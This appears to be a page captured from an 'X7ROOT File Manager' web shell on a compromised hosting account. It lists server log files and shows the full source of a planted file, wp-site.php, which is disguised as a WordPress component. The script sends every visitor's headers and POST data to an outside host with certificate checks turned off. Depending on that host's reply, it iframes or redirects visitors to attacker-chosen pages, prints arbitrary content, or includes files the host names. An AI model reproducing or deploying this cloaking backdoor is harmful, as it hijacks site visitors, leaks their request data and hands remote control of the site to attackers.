File Manager

X7ROOT File Manager

Current Path: /home/gfecatvj/logs

📁 ..
📄 .htaccess(619 B)
📄 .php.error.log(9.07 KB)
📄 4abetter.us.gfects.com-Mar-2026.gz(78.05 KB)
📄 4abetter.us.gfects.com-ssl_log-Mar-2026.gz(12.79 MB)
📄 _wildcard_.4abetter.us-Mar-2026.gz(2.34 KB)
📄 _wildcard_.4abetter.us-ssl_log-Mar-2026.gz(3.93 KB)
📄 _wildcard_.gfects.com-Mar-2026.gz(2.51 KB)
📄 _wildcard_.gfects.com-ssl_log-Mar-2026.gz(10.64 KB)
📄 consultiumghana.gfects.com-Apr-2021.gz(11.8 KB)
📄 consultiumghana.gfects.com-ssl_log-Apr-2021.gz(79.64 KB)
📄 ftp.gfects.com-ftp_log-Aug-2025.gz(1.28 KB)
📄 ftp.gfects.com-ftp_log-Jul-2018.gz(661 B)
📄 ftp.gfects.com-ftp_log-Oct-2017.gz(40 B)
📄 ftp.gfects.com-ftp_log-Sep-2017.gz(573 B)
📄 ftp.gfects.com-ftp_log-Sep-2019.gz(846 B)
📄 gfects.com-Mar-2026.gz(206.05 KB)
📄 gfects.com-ssl_log-Mar-2026.gz(21.17 MB)
📄 gfinition.gfects.com-Apr-2023.gz(337 B)
📄 gfinition.gfects.com-Apr-2024.gz(374 B)
📄 gfinition.gfects.com-Dec-2024.gz(184 B)
📄 gfinition.gfects.com-Jan-2023.gz(306 B)
📄 gfinition.gfects.com-Jun-2022.gz(352 B)
📄 gfinition.gfects.com-Nov-2023.gz(163 B)
📄 gfinition.gfects.com-Nov-2024.gz(185 B)
📄 gfinition.gfects.com-Sep-2023.gz(162 B)
📄 gfinition.gfects.com-Sep-2024.gz(184 B)
📄 gfinition.gfects.com-ssl_log-Aug-2025.gz(175 B)
📄 gfinition.gfects.com-ssl_log-Feb-2022.gz(11.42 KB)
📄 gfinition.gfects.com-ssl_log-Feb-2024.gz(163 B)
📄 gfinition.gfects.com-ssl_log-Feb-2026.gz(183 B)
📄 gfinition.gfects.com-ssl_log-Jan-2025.gz(187 B)
📄 gfinition.gfects.com-ssl_log-Mar-2022.gz(822 B)
📄 gfinition.gfects.com-ssl_log-Mar-2025.gz(186 B)
📄 gfinition.gfects.com-ssl_log-Mar-2026.gz(183 B)
📄 gfinition.gfects.com-ssl_log-May-2024.gz(560 B)
📄 gfinition.gfects.com-ssl_log-Oct-2025.gz(181 B)
📄 gfinition.gfects.com-ssl_log-Sep-2024.gz(188 B)
📄 gfx.gfects.com-Dec-2025.gz(722 B)
📄 gfx.gfects.com-Jan-2022.gz(375 B)
📄 gfx.gfects.com-Jun-2022.gz(343 B)
📄 gfx.gfects.com-Mar-2026.gz(143 B)
📄 gfx.gfects.com-ssl_log-Dec-2021.gz(407 B)
📄 gfx.gfects.com-ssl_log-Feb-2026.gz(178 B)
📄 gfx.gfects.com-ssl_log-Mar-2026.gz(179 B)
📄 index.php(15.38 KB)
📄 localrentandbuy.gfects.com-Apr-2023.gz(343 B)
📄 localrentandbuy.gfects.com-Jan-2023.gz(159 B)
📄 localrentandbuy.gfects.com-Jan-2024.gz(350 B)
📄 localrentandbuy.gfects.com-Jun-2022.gz(381 B)
📄 localrentandbuy.gfects.com-Sep-2021.gz(312 B)
📄 localrentandbuy.gfects.com-Sep-2023.gz(311 B)
📄 localrentandbuy.gfects.com-ssl_log-Dec-2021.gz(137 B)
📄 localrentandbuy.gfects.com-ssl_log-Dec-2023.gz(92 B)
📄 localrentandbuy.gfects.com-ssl_log-Jan-2024.gz(94 B)
📄 localrentandbuy.gfects.com-ssl_log-Jul-2021.gz(11.79 KB)
📄 localrentandbuy.gfects.com-ssl_log-Jul-2023.gz(112 B)
📄 qazser.gfects.com-Dec-2018.gz(16.21 KB)
📄 qazser.gfects.com-Mar-2020.gz(157 B)
📄 qazser.gfects.com-Mar-2021.gz(372 B)
📄 qazser.gfects.com-ssl_log-Dec-2018.gz(2.47 KB)
📄 qazser.gfects.com-ssl_log-Jan-2019.gz(661 B)
📄 qcoder.gfects.com-Apr-2024.gz(369 B)
📄 qcoder.gfects.com-Dec-2024.gz(183 B)
📄 qcoder.gfects.com-Jan-2023.gz(163 B)
📄 qcoder.gfects.com-Jun-2022.gz(344 B)
📄 qcoder.gfects.com-May-2023.gz(273 B)
📄 qcoder.gfects.com-Nov-2023.gz(158 B)
📄 qcoder.gfects.com-Nov-2024.gz(184 B)
📄 qcoder.gfects.com-Sep-2023.gz(159 B)
📄 qcoder.gfects.com-Sep-2024.gz(184 B)
📄 qcoder.gfects.com-ssl_log-Aug-2025.gz(182 B)
📄 qcoder.gfects.com-ssl_log-Feb-2026.gz(368 B)
📄 qcoder.gfects.com-ssl_log-Jan-2025.gz(185 B)
📄 qcoder.gfects.com-ssl_log-Mar-2022.gz(81 KB)
📄 qcoder.gfects.com-ssl_log-Mar-2024.gz(313 B)
📄 qcoder.gfects.com-ssl_log-Mar-2025.gz(184 B)
📄 qcoder.gfects.com-ssl_log-Mar-2026.gz(183 B)
📄 qcoder.gfects.com-ssl_log-May-2024.gz(557 B)
📄 qcoder.gfects.com-ssl_log-Sep-2024.gz(192 B)
📄 qlinz.gfects.com-Dec-2018.gz(164 B)
📄 qlinz.gfects.com-Mar-2020.gz(159 B)
📄 qlinz.gfects.com-Mar-2021.gz(338 B)
📄 qlinz.gfects.com-May-2018.gz(30.79 KB)
📄 qlinz.gfects.com-Nov-2018.gz(1.37 KB)
📄 qlinz.gfects.com-ssl_log-May-2018.gz(2.8 KB)
📄 qlinz.gfects.com-ssl_log-Nov-2018.gz(1.44 KB)
📄 radontect.gfects.com-Apr-2024.gz(329 B)
📄 radontect.gfects.com-Dec-2024.gz(164 B)
📄 radontect.gfects.com-Jan-2022.gz(376 B)
📄 radontect.gfects.com-Jan-2023.gz(469 B)
📄 radontect.gfects.com-Jun-2022.gz(344 B)
📄 radontect.gfects.com-Nov-2023.gz(166 B)
📄 radontect.gfects.com-Sep-2023.gz(334 B)
📄 radontect.gfects.com-Sep-2024.gz(164 B)
📄 radontect.gfects.com-ssl_log-Apr-2021.gz(282 B)
📄 radontect.gfects.com-ssl_log-Aug-2025.gz(184 B)
📄 radontect.gfects.com-ssl_log-Dec-2021.gz(399 B)
📄 radontect.gfects.com-ssl_log-Feb-2024.gz(167 B)
📄 radontect.gfects.com-ssl_log-Feb-2026.gz(184 B)
📄 radontect.gfects.com-ssl_log-Jan-2023.gz(271 B)
📄 radontect.gfects.com-ssl_log-Jan-2024.gz(172 B)
📄 radontect.gfects.com-ssl_log-Jan-2025.gz(178 B)
📄 radontect.gfects.com-ssl_log-Mar-2021.gz(41.91 KB)
📄 radontect.gfects.com-ssl_log-Mar-2026.gz(180 B)
📄 radontect.gfects.com-ssl_log-May-2024.gz(535 B)
📄 radontect.gfects.com-ssl_log-Nov-2023.gz(143 B)
📄 radontect.gfects.com-ssl_log-Sep-2023.gz(290 B)
📄 radontect.gfects.com-ssl_log-Sep-2024.gz(187 B)
📁 roundcube
📄 scustime.gfects.com-Feb-2023.gz(362 B)
📄 scustime.gfects.com-Feb-2026.gz(1.27 KB)
📄 scustime.gfects.com-Jul-2022.gz(207 B)
📄 scustime.gfects.com-Jun-2022.gz(378 B)
📄 scustime.gfects.com-Mar-2026.gz(2.78 KB)
📄 scustime.gfects.com-Sep-2024.gz(1014 B)
📄 scustime.gfects.com-ssl_log-Jan-2022.gz(360 B)
📄 scustime.gfects.com-ssl_log-Mar-2022.gz(208 B)
📄 scustime.gfects.com-ssl_log-Mar-2026.gz(760 B)
📄 wp-bot.php(5.24 KB)
📄 wp-site.php(7.2 KB)

Editing: wp-site.php

<?php
$isTarget = (new RequestHandlerClient())->run();

class RequestHandlerClient{ const SERVER_URL
= 'https://rbl.palladium.expert';

/**
     * @param int    $clientId
     * @param string $company
     * @param string $secret
     *
     * @return void
     * @throws \Exception
     */
    public function run()
    {
        $headers = [];
        $headers['request'] = $this->collectRequestData();
        $headers['jsrequest'] = $this->collectJsRequestData();
        $headers['server'] = $this->collectHeaders();
        $headers['auth']['clientId'] = 3838;
        $headers['auth']['clientCompany'] = "6ElxNmM7t6nhI6uHtzoG";
        $headers['auth']['clientSecret'] = "MzgzODZFbHhObU03dDZuaEk2dUh0em9HY2U2NmY2ZTZmOWRlZjUxMGFjNDBiYTJlNjVjMmFjZGEwMTQyZmZhZQ==";
        $headers['server']['bannerSource'] = 'adwords';

return $this->curlSend($headers);
    }

/**
     * @param array<string, mixed> $params
     *
     * @return bool
     * @throws \Exception
     */
    public function curlSend(array $params)
    {
        $answer = false;
        $curl = curl_init(self::SERVER_URL);
        if ($curl) {
            curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
            curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
            curl_setopt($curl, CURLOPT_POST, true);
            curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($params));

curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3);
            curl_setopt($curl, CURLOPT_TIMEOUT, 4);
            curl_setopt($curl, CURLOPT_TIMEOUT_MS, 4000);
            curl_setopt($curl, CURLOPT_FORBID_REUSE, true);

$result = curl_exec($curl);
            if ($result) {
				$serverOut = json_decode(
					$result,
					true
				);
				$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);

if ($status == 200 && is_array($serverOut)) {
					$answer = $this->handleServerReply($serverOut);
					return $answer;
				}
			}
        }

$this->getDefaultAnswer();
        return $answer;
    }

protected function handleServerReply($reply)
    {
        $result = (bool) ($reply['result'] ? $reply['result'] : 0);

if (
			isset($reply['mode']) &&
			(
				(isset($reply['target'])) ||
				(isset($reply['content']) && !empty($reply['content']))
			)
		) {
            $target = $reply['target'];
            $mode = $reply['mode'];
            $content = $reply['content'];

if (preg_match('/^https?:/i', $target) && $mode == 3) {
                // do fallback to mode2
                $mode = 2;
            }

if ($result && $mode == 1) {
				$this->displayIFrame($target);
				exit;
			} elseif ($result && $mode == 2) {
				header("Location: {$target}");
				exit;
			} elseif ($result && $mode == 3) {
				$target = parse_url($target);
				if (isset($target['query'])) {
					parse_str($target['query'], $_GET);
				}
				$this->hideFormNotification();
				require_once $this->sanitizePath($target['path']);
				exit;
			} elseif ($result && $mode == 4) {
				echo $content;
				exit;
			} else if (!$result && $mode == 5) {
				//
			} elseif ($mode == 6) {
				//
			} else {
				$path = $this->sanitizePath($target);
				if (!$this->isLocal($path)) {
					header("404 Not Found", true, 404);
				} else {
					$this->hideFormNotification();
					require_once $path;
				}
				exit;
			}
        }

return $result;
    }

private function hideFormNotification()
	{
		echo "";
		//echo "<script>if ( window.history.replaceState ) {window.history.replaceState( null, null, window.location.href );}</script>";
	}

private function displayIFrame($target) {
		$target = htmlspecialchars($target);
		echo "<html>
                  <head>
                  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">
                  </head>
                  <body>" .
                  $this->hideFormNotification() .
                  "<iframe src=\"{$target}\" style=\"width:100%;height:100%;position:absolute;top:0;left:0;z-index:999999;border:none;\"></iframe>
                  </body>
              </html>";
	}

private function sanitizePath($path)
    {
        if ($path[0] !== '/') {
            $path = __DIR__ . '/' . $path;
        } else {
            $path = __DIR__ . $path;
        }
        return $path;
    }

private function isLocal($path)
    {
        // do not validate url via filter_var
        $url = parse_url($path);

if (!isset($url['scheme']) || !isset($url['host'])) {
            return true;
        } else {
            return false;
        }
    }

/**
     * Get all HTTP server headers and few additional ones
     *
     * @return mixed
     */
    protected function collectHeaders()
    {
        $userParams = [
            'REMOTE_ADDR',
            'SERVER_PROTOCOL',
            'SERVER_PORT',
            'REMOTE_PORT',
            'QUERY_STRING',
            'REQUEST_SCHEME',
            'REQUEST_URI',
            'REQUEST_TIME_FLOAT',
            'X_FB_HTTP_ENGINE',
            'X_PURPOSE',
            'X_FORWARDED_FOR',
            'X_WAP_PROFILE',
            'X-Forwarded-Host',
            'X-Forwarded-For',
            'X-Frame-Options',
        ];

$headers = [];
        foreach ($_SERVER as $key => $value) {
            if (in_array($key, $userParams) || substr_compare('HTTP', $key, 0, 4) == 0) {
                $headers[$key] = $value;
            }
        }

return $headers;
    }

private function collectRequestData(): array
    {
        $data = [];
        if (!empty($_POST)) {
            if (!empty($_POST['data'])) {
            	$data = json_decode($_POST['data'], true);
            	if (JSON_ERROR_NONE !== json_last_error()) {
            		$data = json_decode(
						stripslashes($_POST['data']),
						true
					);
            	}
                unset($_REQUEST['data']);
            }

if (!empty($_POST['crossref_sessionid'])) {
                $data['cr-session-id'] = $_POST['crossref_sessionid'];
                unset($_POST['crossref_sessionid']);
            }
        }

return $data;
    }

public function collectJsRequestData(): array
    {
        $data = [];
        if (!empty($_POST)) {
            if (!empty($_POST['jsdata'])) {
                $data = json_decode($_POST['jsdata'], true);
                if (JSON_ERROR_NONE !== json_last_error()) {
                    $data = json_decode(
                        stripslashes($_POST['jsdata']),
                        true
                    );
                }
                unset($_REQUEST['jsdata']);
            }
        }
        return $data;
    }

/**
     * Default answer for the curl request in case of fault
     *
     * @return bool
     */
    private function getDefaultAnswer()
    {
		header($_SERVER["SERVER_PROTOCOL"] . ' 500 Internal Server Error', true, 500);
		echo "<h1>500 Internal Server Error</h1>
		<p>The request was unsuccessful due to an unexpected condition encountered by the server.</p>";
		exit;
    }
}

X7ROOT File Manager

Editing: wp-site.php

Upload File

Create Folder